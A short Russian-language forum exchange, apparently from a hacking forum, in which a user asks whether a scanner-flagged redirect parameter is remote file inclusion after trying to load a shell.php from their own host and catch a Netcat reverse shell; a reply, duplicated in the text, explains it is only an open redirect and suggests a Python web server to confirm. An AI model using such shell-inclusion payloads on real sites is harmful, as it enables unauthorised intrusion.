Нашел уязвимость c помощью owasp zap, выдало как RFI, но не уверен, что это так.
Параметр страницы:
currency_code=&redirect=http%3A%2F%2Fwww.google.co m%2F, и редиректит на страницу гугл.
Пытался залить шелл:
currency_code=&redirect=http://ip/shell.php, файл скачивает, но с помощью Netcat обратную оболочку не дает.
С чем это связано, и есть ли тут вообще RFI или только OPEN REDIRECT?
Судя по всему, только редирект. Если бы был RFI, то тебя не ридеректило бы, а вместо этого содержимое гугл-страницы отображалось бы на странице целевого сайта.
На удаленном сервере http://ip/ (где shell.php) подними веб сервер:
Код:
python3 -m http.server 8000
и подставь адрес http://ip:8000/ в параметр redirect твоего запроса. На удаленном сервере скорее всего увидишь свой собственный ip и юзер-агент.
Судя по всему, только редирект. Если бы был RFI, то тебя не ридеректило бы, а вместо этого содержимое гугл-страницы отображалось бы на странице целевого сайта.
На удаленном сервере http://ip/ (где shell.php) подними веб сервер:
Код:
python3 -m http.server 8000
и подставь адрес http://ip:8000/ в параметр redirect твоего запроса. На удаленном сервере скорее всего увидишь свой собственный ip и юзер-агент.